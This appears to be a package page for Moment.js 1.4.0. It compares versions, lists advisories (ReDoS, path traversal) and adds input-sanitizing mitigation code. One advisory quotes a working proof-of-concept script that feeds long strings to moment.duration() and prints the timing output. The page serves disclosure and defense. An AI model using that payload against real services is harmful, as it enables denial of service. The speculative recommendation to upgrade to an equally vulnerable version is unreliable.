Moment.js version 1.4.0, released on February 3, 2012, builds upon the foundation laid by version 1.3.0, released almost a month earlier on January 5, 2012. While both versions offer the core functionality of creating, manipulating, and formatting dates in JavaScript without modifying the native Date object, a notable difference lies in the development dependencies used. Version 1.4.0 introduces a suite of tools for development and optimization, including gzip for compression, jade for templating (likely for documentation or website generation), qunit for testing, bunker (purpose unclear without further context), jshint for code quality, clean-css for CSS minification, and uglify-js for JavaScript minification.
This signifies a move towards a more robust and streamlined development process. For developers using Moment.js, this translates to a more stable and potentially optimized library. Although no breaking changes or new features are explicitly apparent from the metadata provided, the inclusion of these development tools hints at improvements in code quality, performance, and maintainability in the newer version. Therefore, upgrading to version 1.4.0 is recommended for developers seeking a more refined and actively developed date manipulation solution if no compatibility issues are present. The core promise of Moment.js remains consistent: a powerful and easy-to-use date library, but with the added benefit of a more rigorously maintained codebase in the later release.
All vulnerabilities affecting version 1.4.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Shared loop counter. The original left i undeclared (an implicit global);
// because genstr also advances it, each outer iteration starts one higher
// than expected, which is why COUNT drifts (20000, 30001, 40002, ...) below.
var i;

// Builds a string of len+1 copies of chr.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Time moment.duration() on ever longer inputs of the form '-111...1'.
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start);
  console.log(end); // [seconds, nanoseconds] spent inside moment.duration()
}
```
```text
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. "fr", is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
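As an added illustration of the mitigations named in these advisories (not code from the moment.js project or the advisory authors), the following JavaScript gates an untrusted locale name before it reaches moment.locale() and caps and shape-checks a duration string before it reaches moment.duration(). The allowlist, the length limit and the ISO 8601 pattern are constructed assumptions for this demo.

```javascript
// Added example, not moment.js code: gate untrusted input before it reaches
// moment.locale() and moment.duration(). SUPPORTED_LOCALES, MAX_DURATION_LEN
// and ISO_DURATION below are constructed assumptions for this demo.

// Locales the application actually ships (constructed allowlist).
const SUPPORTED_LOCALES = new Set(['en', 'en-gb', 'fr', 'de', 'ja']);
// Language-tag shape only: letters plus optional '-' subtags. No '/', '.' or
// '\', so path-like names such as 'dir/../../filename' fail on shape alone.
// No nested quantifiers, so the check itself runs in linear time.
const LOCALE_SHAPE = /^[a-z]{2,3}(-[a-z0-9]{2,8})*$/i;

// Assumed upper bound: a legitimate duration string is a few dozen characters,
// while the proof of concept above needs tens of thousands to become slow.
const MAX_DURATION_LEN = 64;
// Constructed ISO 8601 duration pattern (e.g. P1Y2M3DT4H5M6S), optional sign.
const ISO_DURATION =
  /^[+-]?P(?=\d|T\d)(\d+Y)?(\d+M)?(\d+W)?(\d+D)?(T(?=\d)(\d+H)?(\d+M)?(\d+(\.\d+)?S)?)?$/;

// Returns a locale name that is safe to hand to moment.locale(); anything
// malformed or not in the allowlist falls back to a known-good default.
function sanitizeLocale(input, fallback = 'en') {
  if (typeof input !== 'string') return fallback;
  const name = input.trim().toLowerCase();
  if (!LOCALE_SHAPE.test(name)) return fallback;
  return SUPPORTED_LOCALES.has(name) ? name : fallback;
}

// Checks a duration string before moment.duration() sees it. The length cap
// runs first, so an oversized string is rejected without any regex work.
function checkDurationInput(input) {
  if (typeof input !== 'string') return { ok: false, reason: 'not a string' };
  if (input.length > MAX_DURATION_LEN) return { ok: false, reason: 'too long' };
  if (!ISO_DURATION.test(input)) return { ok: false, reason: 'not ISO 8601' };
  return { ok: true, value: input };
}

// Usage at a request boundary (moment itself is not loaded in this demo):
//   moment.locale(sanitizeLocale(req.query.locale));
//   const d = checkDurationInput(req.body.duration);
//   if (d.ok) moment.duration(d.value); else reject(d.reason);
```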